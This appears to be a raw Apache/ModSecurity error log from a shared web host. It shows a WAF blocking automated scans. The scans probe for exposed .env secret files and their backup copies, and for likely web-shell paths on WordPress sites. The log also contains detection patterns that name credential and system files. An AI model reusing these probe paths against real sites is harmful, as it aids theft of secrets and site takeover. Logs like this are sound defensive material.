[Tue May 26 13:11:57.071891 2026] [security2:error] [pid 496740:tid 496966] [client 20.151.117.104:44972] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/makeasmtp.php"] [unique_id "ahVOxevOeft4ltnLrH40UgAAAGA"]
[Tue May 26 13:11:57.179673 2026] [security2:error] [pid 496740:tid 496929] [client 207.241.173.215:11436] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env"] [unique_id "ahVOxevOeft4ltnLrH40WgAAADs"]
[Tue May 26 13:11:57.179909 2026] [security2:error] [pid 496740:tid 496978] [client 207.241.173.215:11408] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/api/.env"] [unique_id "ahVOxevOeft4ltnLrH40XQAAAGw"]
[Tue May 26 13:11:57.191002 2026] [security2:error] [pid 496740:tid 496897] [client 207.241.173.215:11494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/backend/.env"] [unique_id "ahVOxevOeft4ltnLrH40YwAAABs"]
[Tue May 26 13:11:57.191016 2026] [security2:error] [pid 496740:tid 496932] [client 207.241.173.215:11478] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/app/.env"] [unique_id "ahVOxevOeft4ltnLrH40YgAAAD4"]
[Tue May 26 13:11:57.216345 2026] [security2:error] [pid 496740:tid 496925] [client 20.151.117.104:35563] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/paku.php"] [unique_id "ahVOxevOeft4ltnLrH40agAAADc"]
[Tue May 26 13:11:57.216434 2026] [security2:error] [pid 496740:tid 496925] [client 20.151.117.104:35563] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/paku.php"] [unique_id "ahVOxevOeft4ltnLrH40agAAADc"]
[Tue May 26 13:11:57.358448 2026] [security2:error] [pid 496740:tid 496965] [client 20.151.117.104:59287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/rtx.php"] [unique_id "ahVOxevOeft4ltnLrH40ggAAAF8"]
[Tue May 26 13:11:57.358551 2026] [security2:error] [pid 496740:tid 496965] [client 20.151.117.104:59287] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/rtx.php"] [unique_id "ahVOxevOeft4ltnLrH40ggAAAF8"]
[Tue May 26 13:11:57.501106 2026] [security2:error] [pid 496740:tid 496969] [client 20.151.117.104:35564] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/update/da222.php"] [unique_id "ahVOxevOeft4ltnLrH40iQAAAGM"]
[Tue May 26 13:11:57.501236 2026] [security2:error] [pid 496740:tid 496969] [client 20.151.117.104:35564] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/update/da222.php"] [unique_id "ahVOxevOeft4ltnLrH40iQAAAGM"]
[Tue May 26 13:11:57.653900 2026] [security2:error] [pid 496740:tid 496948] [client 20.151.117.104:6668] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOxevOeft4ltnLrH40kwAAAE4"]
[Tue May 26 13:11:57.727525 2026] [security2:error] [pid 496740:tid 496939] [client 20.151.117.104:6668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/min.php"] [unique_id "ahVOxevOeft4ltnLrH40lwAAAEU"]
[Tue May 26 13:11:57.727685 2026] [security2:error] [pid 496740:tid 496939] [client 20.151.117.104:6668] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/min.php"] [unique_id "ahVOxevOeft4ltnLrH40lwAAAEU"]
[Tue May 26 13:11:57.870041 2026] [security2:error] [pid 496740:tid 496919] [client 20.151.117.104:27652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/wp-fileesx-449.php"] [unique_id "ahVOxevOeft4ltnLrH40ngAAADE"]
[Tue May 26 13:11:57.870158 2026] [security2:error] [pid 496740:tid 496919] [client 20.151.117.104:27652] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/wp-fileesx-449.php"] [unique_id "ahVOxevOeft4ltnLrH40ngAAADE"]
[Tue May 26 13:11:58.013095 2026] [security2:error] [pid 496740:tid 496884] [client 20.151.117.104:16128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/themes/min.php"] [unique_id "ahVOxuvOeft4ltnLrH40owAAAA4"]
[Tue May 26 13:11:58.013275 2026] [security2:error] [pid 496740:tid 496884] [client 20.151.117.104:16128] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/themes/min.php"] [unique_id "ahVOxuvOeft4ltnLrH40owAAAA4"]
[Tue May 26 13:11:58.065720 2026] [security2:error] [pid 496740:tid 496886] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOxevOeft4ltnLrH40jwAAABA"]
[Tue May 26 13:11:58.158200 2026] [security2:error] [pid 496740:tid 496958] [client 20.151.117.104:49863] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/themes/x/bypass.php"] [unique_id "ahVOxuvOeft4ltnLrH40rQAAAFg"]
[Tue May 26 13:11:58.158345 2026] [security2:error] [pid 496740:tid 496958] [client 20.151.117.104:49863] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/themes/x/bypass.php"] [unique_id "ahVOxuvOeft4ltnLrH40rQAAAFg"]
[Tue May 26 13:11:58.300969 2026] [security2:error] [pid 496740:tid 496990] [client 20.151.117.104:42110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-includes/interactivity-api/index.php"] [unique_id "ahVOxuvOeft4ltnLrH40ugAAAHg"]
[Tue May 26 13:11:58.301096 2026] [security2:error] [pid 496740:tid 496990] [client 20.151.117.104:42110] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-includes/interactivity-api/index.php"] [unique_id "ahVOxuvOeft4ltnLrH40ugAAAHg"]
[Tue May 26 13:11:58.445253 2026] [security2:error] [pid 496740:tid 496939] [client 20.151.117.104:35532] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-info.php"] [unique_id "ahVOxuvOeft4ltnLrH40wgAAAEU"]
[Tue May 26 13:11:58.445359 2026] [security2:error] [pid 496740:tid 496939] [client 20.151.117.104:35532] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-info.php"] [unique_id "ahVOxuvOeft4ltnLrH40wgAAAEU"]
[Tue May 26 13:11:58.588367 2026] [security2:error] [pid 496740:tid 496942] [client 20.151.117.104:54404] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-wordfence-waf.php"] [unique_id "ahVOxuvOeft4ltnLrH40ygAAAEg"]
[Tue May 26 13:11:58.588473 2026] [security2:error] [pid 496740:tid 496942] [client 20.151.117.104:54404] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-wordfence-waf.php"] [unique_id "ahVOxuvOeft4ltnLrH40ygAAAEg"]
[Tue May 26 13:11:58.730848 2026] [security2:error] [pid 496740:tid 496981] [client 20.151.117.104:27904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ws49.php"] [unique_id "ahVOxuvOeft4ltnLrH400QAAAG8"]
[Tue May 26 13:11:58.730976 2026] [security2:error] [pid 496740:tid 496981] [client 20.151.117.104:27904] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ws49.php"] [unique_id "ahVOxuvOeft4ltnLrH400QAAAG8"]
[Tue May 26 13:11:58.746072 2026] [security2:error] [pid 496740:tid 496872] [client 207.241.173.215:11436] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.production.copy"] [unique_id "ahVOxuvOeft4ltnLrH400gAAAAI"]
[Tue May 26 13:11:58.761688 2026] [security2:error] [pid 496740:tid 496890] [client 104.23.217.13:10701] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "paqys.com"] [uri "/index.php"] [unique_id "ahVOxuvOeft4ltnLrH40pAAAABQ"]
[Tue May 26 13:11:58.804024 2026] [security2:error] [pid 496740:tid 496844] [remote 185.177.72.30:64738] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/.phpunit.result.cache"] [unique_id "ahVOxuvOeft4ltnLrH400wAAG2c"]
[Tue May 26 13:11:58.873592 2026] [security2:error] [pid 496740:tid 496944] [client 20.151.117.104:40688] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/xxx.php"] [unique_id "ahVOxuvOeft4ltnLrH402gAAAEo"]
[Tue May 26 13:11:58.873718 2026] [security2:error] [pid 496740:tid 496944] [client 20.151.117.104:40688] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/xxx.php"] [unique_id "ahVOxuvOeft4ltnLrH402gAAAEo"]
[Tue May 26 13:11:59.016688 2026] [security2:error] [pid 496740:tid 496984] [client 20.151.117.104:30852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/CDX1.php"] [unique_id "ahVOx-vOeft4ltnLrH405AAAAHI"]
[Tue May 26 13:11:59.016797 2026] [security2:error] [pid 496740:tid 496984] [client 20.151.117.104:30852] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/CDX1.php"] [unique_id "ahVOx-vOeft4ltnLrH405AAAAHI"]
[Tue May 26 13:11:59.121441 2026] [fcgid:warn] [pid 496740:tid 496954] (70014)End of file found: [client 199.45.154.142:36360] mod_fcgid: can't get data from http client
[Tue May 26 13:11:59.165680 2026] [security2:error] [pid 496740:tid 496889] [client 20.151.117.104:14272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/akcc.php"] [unique_id "ahVOx-vOeft4ltnLrH405wAAABM"]
[Tue May 26 13:11:59.165776 2026] [security2:error] [pid 496740:tid 496889] [client 20.151.117.104:14272] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/akcc.php"] [unique_id "ahVOx-vOeft4ltnLrH405wAAABM"]
[Tue May 26 13:11:59.309698 2026] [security2:error] [pid 496740:tid 496927] [client 20.151.117.104:6690] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/control.php"] [unique_id "ahVOx-vOeft4ltnLrH408QAAADk"]
[Tue May 26 13:11:59.309819 2026] [security2:error] [pid 496740:tid 496927] [client 20.151.117.104:6690] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/control.php"] [unique_id "ahVOx-vOeft4ltnLrH408QAAADk"]
[Tue May 26 13:11:59.458383 2026] [security2:error] [pid 496740:tid 496935] [client 20.151.117.104:27929] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/modules/mod_footer/tmpl/index.php"] [unique_id "ahVOx-vOeft4ltnLrH40-wAAAEE"]
[Tue May 26 13:11:59.458502 2026] [security2:error] [pid 496740:tid 496935] [client 20.151.117.104:27929] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/modules/mod_footer/tmpl/index.php"] [unique_id "ahVOx-vOeft4ltnLrH40-wAAAEE"]
[Tue May 26 13:11:59.476050 2026] [security2:error] [pid 496740:tid 496907] [client 207.241.173.215:11524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.bak"] [unique_id "ahVOx-vOeft4ltnLrH40_wAAACU"]
[Tue May 26 13:11:59.601201 2026] [security2:error] [pid 496740:tid 496981] [client 20.151.117.104:28882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/s.php"] [unique_id "ahVOx-vOeft4ltnLrH41AgAAAG8"]
[Tue May 26 13:11:59.601322 2026] [security2:error] [pid 496740:tid 496981] [client 20.151.117.104:28882] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/s.php"] [unique_id "ahVOx-vOeft4ltnLrH41AgAAAG8"]
[Tue May 26 13:11:59.620896 2026] [security2:error] [pid 496740:tid 496972] [client 64.233.173.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVOxuvOeft4ltnLrH40vgAAZlc"]
[Tue May 26 13:11:59.749645 2026] [security2:error] [pid 496740:tid 496974] [client 20.151.117.104:14272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/sagax.php"] [unique_id "ahVOx-vOeft4ltnLrH41CAAAAGg"]
[Tue May 26 13:11:59.749777 2026] [security2:error] [pid 496740:tid 496974] [client 20.151.117.104:14272] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/sagax.php"] [unique_id "ahVOx-vOeft4ltnLrH41CAAAAGg"]
[Tue May 26 13:11:59.901676 2026] [security2:error] [pid 496740:tid 496917] [client 20.151.117.104:49102] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOx-vOeft4ltnLrH41GAAAAC8"]
[Tue May 26 13:11:59.974312 2026] [security2:error] [pid 496740:tid 496982] [client 207.241.173.215:11730] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env~"] [unique_id "ahVOx-vOeft4ltnLrH41GQAAAHA"]
[Tue May 26 13:11:59.975241 2026] [security2:error] [pid 496740:tid 496989] [client 207.241.173.215:11898] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.production~"] [unique_id "ahVOx-vOeft4ltnLrH41GgAAAHc"]
[Tue May 26 13:11:59.975740 2026] [security2:error] [pid 496740:tid 496932] [client 20.151.117.104:49102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/wp-teest.php"] [unique_id "ahVOx-vOeft4ltnLrH41IAAAAD4"]
[Tue May 26 13:11:59.975845 2026] [security2:error] [pid 496740:tid 496932] [client 20.151.117.104:49102] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/wp-teest.php"] [unique_id "ahVOx-vOeft4ltnLrH41IAAAAD4"]
[Tue May 26 13:11:59.976436 2026] [security2:error] [pid 496740:tid 496962] [client 207.241.173.215:11914] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.production.swp"] [unique_id "ahVOx-vOeft4ltnLrH41HAAAAFw"]
[Tue May 26 13:11:59.976881 2026] [security2:error] [pid 496740:tid 496980] [client 207.241.173.215:11858] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.production.bak"] [unique_id "ahVOx-vOeft4ltnLrH41HQAAAG4"]
[Tue May 26 13:11:59.976952 2026] [security2:error] [pid 496740:tid 496880] [client 207.241.173.215:11920] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.production.orig"] [unique_id "ahVOx-vOeft4ltnLrH41HgAAAAo"]
[Tue May 26 13:11:59.977085 2026] [security2:error] [pid 496740:tid 496966] [client 207.241.173.215:11812] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.local.bak"] [unique_id "ahVOx-vOeft4ltnLrH41IQAAAGA"]
[Tue May 26 13:11:59.977790 2026] [security2:error] [pid 496740:tid 496937] [client 207.241.173.215:11856] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.local.copy"] [unique_id "ahVOx-vOeft4ltnLrH41GwAAAEM"]
